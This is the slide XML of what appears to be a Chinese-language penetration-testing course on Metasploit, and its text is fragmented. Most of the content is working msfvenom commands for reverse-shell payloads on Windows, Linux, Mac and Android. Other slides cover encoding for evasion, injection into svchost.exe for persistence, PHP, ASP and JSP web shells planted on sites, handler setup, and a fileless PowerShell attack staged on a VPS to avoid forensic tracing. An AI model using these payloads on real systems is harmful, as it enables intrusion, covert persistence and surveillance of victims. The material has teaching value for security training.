            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p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609" y="81843"/>
            <a:ext cx="10339070" cy="64008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payload的可持续化建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a: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668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svchost进程污染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> 进程迁移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608" y="613459"/>
            <a:ext cx="11339075" cy="59030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1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>一般来说使用msfvenom生成的payload会单独开启一个进程，这种进程很容易被发现和关闭，在后期想做持久化的时候只能再使用migrate进行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>其实在生成payload时可直接使用如下命令，生成的payload会直接注入到指定进程中。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的时候就进行进程迁移，保证会话稳定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err="1">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t> LHOST=192.168.149.142 LPORT=1122 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t> -b "\x00" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t> 5 -a x86 --platform win </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>PrependMigrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:highlight>
                  <a:srgbClr val="7DE2E7"/>
                </a:highlight>
              </a:rPr>
              <a:t>=true PrependMigrateProc=svchost.exe -f exe -o shell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PrependMigrate=true是否启用进程迁移 迁移到svchost进程中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表示输出的文件类型为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o shell.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输出位置也可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; /root/1.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668BE4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>生成的shell程序执行后会启动两个进程shell.exe和svchost.exe，关闭其中一个不会影响会话状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在上面的生成payload参数中：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（1）PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程，自己测试的时候不建议到这个进程而是其他的持久进程。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（2）使用-p指定使用的攻击载荷模块，使用-e指定使用x86/shikata_ga_nai编码器，使用-f选项告诉MSF编码器输出格式为exe，-o选项指定输出的文件名为payload.exe，保存在根目录下。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0457" y="339042"/>
            <a:ext cx="4602860" cy="7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dirty="0"/>
              <a:t>各平台payload生成</a:t>
            </a:r>
            <a:endParaRPr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9357" y="1089351"/>
            <a:ext cx="9918344" cy="4875613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Linux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linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf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msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.149.147 LPORT=1123 -a x86 --platform Linux -f elf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.elf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zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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自己日自己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) ./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</a:rPr>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>运行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Windows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windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe &gt; shell.exe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Mac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osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.macho</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1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 err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Android</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1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msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.apk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1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.apk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安装到手机中，植入的时候需要做免杀，以及需要权限 成功以后可以获取通话信息。。。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android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R &gt; test.apk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生成脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload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Powershell  生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的脚本运行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>后面在内网的时候还会讲</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>nc正向连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.8.124 LPORT=1122  -f exe&gt; 1.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>nc反向连接，监听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.124 LPORT=1122  -f exe&gt; 1.exe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30" y="822117"/>
            <a:ext cx="4601108" cy="7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dirty="0"/>
              <a:t>生成脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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82766" y="1999716"/>
            <a:ext cx="10203679" cy="404216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PHP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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就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bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>将生成的脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>shell.php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000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>脚本需要设置权限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000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>放到放到网站下面 然后访问运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight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bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>设置之前脚本的侦听，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000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>的格式为脚本的类型格式  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000000"/>
                </a:highlight>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>注意调用的是什么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FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>就侦听该类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚本 就会建立会话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155" y="3782701"/>
            <a:ext cx="7685714" cy="4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5" y="4258891"/>
            <a:ext cx="6038095" cy="115238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3700" y="152400"/>
            <a:ext cx="10780045" cy="58894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注意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通过脚本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(shell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脚本、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php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脚本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反弹的会话 提权很难 ，缺少下述模块，可以认为是阉割版 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--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烂土豆不行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也就是说通过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php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shell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脚本建立的会话权限会缺失一些模块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但是上传的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exe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文件建立会话后是能够进行提权的，如下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所以在这个时候需要上传一些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exe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程序到服务器，这样提权容易成功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如果不能运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd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，可以查询一下是什么原因导致不能执行的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以及是不是权限的问题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如果是插件的问题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–</a:t>
            </a:r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可以变换脚本类型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asp </a:t>
            </a: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1800" dirty="0" err="1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aspx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52" y="511361"/>
            <a:ext cx="7438095" cy="6095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1" y="1974957"/>
            <a:ext cx="8542857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5830" y="822117"/>
            <a:ext cx="4601108" cy="7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dirty="0"/>
              <a:t>生成脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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82766" y="1999716"/>
            <a:ext cx="10203679" cy="40421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zh-CN" sz="1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cat shell.php | pbcopy &amp;&amp; echo '&lt;?php ' | tr -d '\n' &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php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ASP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windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f asp &gt; shell.asp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JSP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java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.jsp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WAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom -p java/jsp_shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f war &gt; shell.war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7284" y="890484"/>
            <a:ext cx="4359275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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启动设置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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059678" y="1991170"/>
            <a:ext cx="10554471" cy="42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service postgresql start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service metasploit start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msfconsole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进入后输入db_status 查看数据库连接状态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workspace  -a  test  创一个工作台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删除 -d 选项 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进入test工作台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Wordspace test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使用nmap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db_nmap -sS 192.168.80.1   扫描主机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db_export 1.xml  导出扫描结果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db_import 1.xml  导入扫描结果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3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>hosts  查看扫描结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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侦听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Handlers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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>use exploit/multi/handler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set PAYLOAD &lt;Payload name&gt;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set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.8.124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set LPORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1122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set ExitOnSession false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exploit -j -z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080" y="54483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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无文件攻击  内存加载远程代码执行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之前：我们需要将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>程序上传到服务器，运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件才能获得会话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在取证溯源的时候就能够查到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无文件攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>让服务器内存加载远程脚本运行进行攻击脚本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就是不上传文件，直接加载到内存中运行，只要服务器关机，除非保存内存 否则很难溯源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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203200"/>
            <a:ext cx="10871835" cy="532972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生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> -p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> LHOST=192.168.149.142 LPORT=1125 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>psh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-reflection &gt;x.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>需要将改脚本放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>vps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>设置侦听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>192.168.8.124 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1125</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
